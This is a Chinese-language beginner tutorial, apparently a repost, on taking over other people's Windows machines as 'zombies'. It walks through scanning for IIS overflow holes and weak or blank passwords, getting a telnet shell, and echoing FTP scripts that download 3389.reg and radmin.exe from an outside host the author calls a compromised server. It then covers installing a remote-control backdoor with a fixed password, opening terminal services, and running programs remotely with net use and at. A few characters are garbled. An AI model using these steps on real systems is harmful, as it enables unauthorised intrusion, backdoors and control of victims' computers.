给初学者看的文章..不要说不懂找肉鸡呀.
肉鸡是我们学习的好工具,是我们的好帮手,呵。
进入正题:
我推荐使用WIN2000自动攻击探测机找你的肉鸡。自从出了这个软件后我就用这个来找肉鸡了。
打开win2000自动攻击探测机。
设置如下:
跟据我的经验有IIS溢出漏洞的一般都是网吧的主机,而系统弱口令的一般是个人用户。有MSSQL空口令则大都为公司之类的主机。个人电脑比较没有利用价值。呵呵。
一、
图中有可以溢出的,直接TELNET IP 99这样就得到了SHELL了,刚开始的时候是空的,(很像没溢出成功)直接输入NET USER这样便可以看到显示出用户名了。这样就说明成功了。接着就是上传文件了。
上传文件的方法无非有:
IPC$(就是共享方式,先建立默认共享连接后进行,可以事先TELNET IP 139如果能连接就可以建立共享了。)
WEBDOWN.VBS(如果没FTP帐户可以使用这种方法,先用ECHO写一个WEBDOW。VBS文件再用它来下载文件。我主页上有提供这个文件的下载)
FTP(我都用这种方式很稳定)
TFTP(好像不太适合外网传输,我没成功过)
ECHO.VBS(详见EVA的文章do all in shell穿过防火墙传输,我主页也有提供这个VBS的下载)
我通常利用FTP方式传输文件,这样传输很稳定。溢出得到的SHELL是不能像本机那样一条命令一条命令的进行FTP操作的。可以把所有有关的FTP命令先用ECHO写到一个文件里(比如ftp.txt)然后用FTP -s:ftp.txt来执行FTP下载文件。
ftp.txt文件的内容:
open www.ee.ndhu.edu.tw FTP服务器
upload 用户名
upload 用户密码
binary 传输模式设为二进制传输
get 3389.reg 下载3389.reg用来开3389的注册表文件
get radmin.exe 下载radmin程序
bye
用ECHO在CMD SHELL里写ftp.txt文件的相应命令为
echo open www.ee.ndhu.edu.tw>>ftp.txt
echo upload>>ftp.txt
echo upload>>ftp.txt
echo binary>>ftp.txt
echo get 3389.reg>>ftp.txt
echo get radmin.exe>>ftp.txt
echo bye>>ftp.txt
当然还可以下载一些其它有用的程序到目标机上。
ftp -s:ftp.txt
(上面其实我已经舜蠹乙桓鯢TP服务器肉机www.ee.ndhu.edu.tw用户名和密码都是真实可用的。
如果自己没FTP服务器的话就用上面的那个吧。radmin.exe和3389.reg服务器上面也有了。。
)
下载完后运行radmin.exe就会自动安装radmin远程管理软件,开端口在3913连接密码为11997711
先用TYPE C:\\BOOT.INI查看一下系统版本
运行regedit /s 3389.reg把开终端服务的注册表文件导入注册表。(3389.reg开终端服务端口在1091重启后有效)也可以利用其它的3389.exe的来开启3389网络上有的下载。
(如果对方是2000SERVER以上版的话)可以进蠭IS溢出的一般是SRV版以上的,不过还是需要查看BOOT.INI文件确认一下。
如果目标机是动态IP的话可以使用一些反弹木马来控制它,也可以使用RADMIN配合我的小程序IP发送者来实现上线邮件通知。
二、
如果有扫描系统弱口令则可以先建立IPC$默认共享连接后上传文件.如果可以建立c$共享连接则说明是2000系列的机子,若不行则多半是XP的了(提示拒绝访问或找不到网络路径) 。因为XP默认共享连接级别都是GUEST
建议映射:net use x: \\\\ip\\c$ "密码" /u:"用户名"
拷贝文件到他的默认共享如c$后就可以配合AT命令让它远程执行了,
先查询一下远程机子的时间net time \\\\ip
然后用at \\\\ip 10:00 c:\\winnt\\system32\\radmin.exe
[1] [2]
让它在10:00这个时间执行radmin.exe
使用AT命令远程执行的一个技巧:
如果执行的命令是带参数的命令则命令那边要这么写:""radmin /install""
前面和后面都是用二个双引号。这样系统才能正确的识别命令和参数。
很多朋友都不知道这个技巧以为AT命令不支持带参数的命令的远程执行呢!
也可以使用一些工具在完成远程执行如psexec.exe。
三、
若扫到MSSQL空口令直接使用天行的mysqlEXEC连接
然后用ECHO写FTP。TXT文件再上传文件过去。
方法同一。
(出处:http://www.sheup.com)
[1] [2]